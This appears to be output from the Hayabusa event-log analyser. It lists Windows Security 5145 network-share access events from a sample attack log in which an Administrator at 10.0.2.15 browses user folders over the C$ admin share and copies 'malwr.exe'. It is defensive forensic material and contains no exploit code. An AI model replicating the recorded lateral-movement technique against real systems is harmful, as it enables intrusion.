0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network 
Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Desktop | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Music | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ui\SwDRM.dll | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\AppData | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | 
